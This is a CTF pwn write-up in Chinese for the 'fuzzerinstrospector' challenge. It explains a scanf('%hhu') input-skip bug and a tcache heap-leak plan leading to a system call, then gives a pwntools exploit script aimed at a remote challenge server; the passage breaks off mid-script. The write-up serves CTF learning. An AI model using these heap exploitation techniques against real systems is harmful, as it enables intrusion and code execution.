fuzzerinstrospector
题目的功能很好分析,但是漏洞点之前没有见过,根据程序流程发现是scanf("%hhu"&x);
存在漏洞,可以再每次新申请堆的时候跳过写入内容,保留原有堆的值。%hhu代表unsigned char,在输入为±符号的时候,输入是跳过的,并且不影响后续的程序流
我的解题思路
- 第一步:申请9个堆,然后释放9个堆,让tcache的队列填满
- 第二步:申请7个堆,这个时候tcache会在最开始接近top chunk的7、8编号堆进行合并,并且保留main_arena地址
- 第三步:利用scanf的漏洞保留main_arena值,并且通过map表泄露
- 第四步:利用隐藏的功能实现system函数调用
# -*- coding: utf-8 -*-
from pwn import *
import pwnlib
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')
#context_terminal = ["terminator","-x","sh","-c"]
def FuzzerBitmap_Creatio(index,content,bitmap,mod):
conn.recvuntil("Your choice:")
conn.sendline("1")
conn.recvuntil("Index:")
conn.sendline(str(index))
for i in range(0,8):
conn.recvuntil(":")
if mod:
conn.sendline(str(ord(content[i])))
else:
conn.sendline(content[i])
conn.recvuntil("Bitmap:")
conn.send(bitmap.ljust(0x100,"\x00"))
def Edit_FuzzerBitmap(index,content,bitmap):
conn.recvuntil("Your choice:")
conn.sendline("2")
conn.recvuntil("Index:")
conn.sendline(str(index))
for i in range(0,8):
conn.recvuntil(":")
conn.sendline(str(ord(content[i])))
conn.recvuntil("Bitmap:")
conn.send(bitmap.ljust(0x100,"\x00"))
def Check_FuzzerBitmap(index):
conn.recvuntil("Your choice:")
conn.sendline("3")
conn.recvuntil("Index:")
conn.sendline(str(index))
def Delete_FuzzerBitmap(index):
conn.recvuntil("Your choice:")
conn.sendline("4")
conn.recvuntil("Index:")
conn.sendline(str(index))
def Attack(paylaod):
conn.recvuntil("Your choice:")
conn.sendline("6")
conn.sendline(str(paylaod))
if __name__ == '__main__':
HOST = '39.105.185.193'
PORT = 30007
conn = remote(HOST ,PORT)
#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so','./ciscn_final_3'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so'})
#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./mrctf2020_shellcode_revenge'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'})
#conn = process("./fuzzerinstrospector")
#pwnlib.gdb.attach(conn,"b main") #b *0x400ECF
pause()
table = ""
for i in range(0,256):
table += chr(i)
FuzzerBitmap_Creatio(0,"A"*8,table,1)
FuzzerBitmap_Creatio(1,"B"*8,table,1)
FuzzerBitmap_Creatio(2,"C"*8,table,1)
FuzzerBitmap_Creatio(3,"D"*8,table,1)
FuzzerBitmap_Creatio(4,"D"*8,table,1)
FuzzerBitmap_Creatio(5,"D"*8,table,1)
FuzzerBitmap_Creatio(6,"D"*8,table,1)
FuzzerBitmap_Creatio(7,"D"*8,table,1)
FuzzerBitmap_Creatio(8,"D"*8,table,1)
Delete_FuzzerBitmap(0)
Delete_FuzzerBitmap(1)
Delete_FuzzerBitmap(2)
Delete_FuzzerBitmap(3)
Delete_FuzzerBitmap(4)
Delete_FuzzerBitmap(5)
Delete_FuzzerBitmap(6)
Delete_FuzzerBitmap(7)
Delete_FuzzerBitmap(8)
FuzzerBitmap_Creatio(0,"+"*8,table,0)
FuzzerBitmap_Creatio(1,"+"*8,table,0)
FuzzerBitmap_Creatio(2,"+"*8,table,